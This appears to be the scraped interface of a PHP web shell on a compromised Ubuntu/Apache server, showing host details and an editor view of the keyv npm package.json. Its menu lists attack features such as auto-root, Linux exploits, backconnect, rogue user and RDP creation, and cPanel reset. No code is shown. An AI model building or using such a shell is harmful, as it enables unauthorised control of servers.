Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
keyv /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
drwxr-xr-x
package.json
1.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "keyv", "version": "4.0.4", "description": "Simple key-value storage with support for multiple backends", "main": "src/index.js", "scripts": { "test": "xo && nyc ava test/keyv.js", "test:full": "xo && nyc ava --serial", "test:services:start": "docker-compose -f ./test/storage-adapters/services-compose.yaml up -d", "test:services:stop": "docker-compose -f ./test/storage-adapters/services-compose.yaml down -v", "coverage": "nyc report --reporter=text-lcov > coverage.lcov" }, "xo": { "extends": "xo-lukechilds", "rules": { "unicorn/prefer-module": 0 } }, "repository": { "type": "git", "url": "git+https://github.com/jaredwray/keyv.git" }, "keywords": [ "key", "value", "store", "cache", "ttl" ], "author": "Jared Wray <me@jaredwray.com> (http://jaredwray.com)", "license": "MIT", "bugs": { "url": "https://github.com/jaredwray/keyv/issues" }, "homepage": "https://github.com/jaredwray/keyv", "dependencies": { "json-buffer": "3.0.1" }, "devDependencies": { "@keyv/mongo": "*", "@keyv/mysql": "*", "@keyv/postgres": "*", "@keyv/redis": "*", "@keyv/sqlite": "*", "@keyv/test-suite": "*", "ava": "^3.15.0", "codecov": "^3.8.3", "eslint-config-xo-lukechilds": "^1.0.0", "nyc": "^15.1.0", "this": "^1.0.2", "timekeeper": "^2.0.0", "xo": "^0.46.3" } }
Close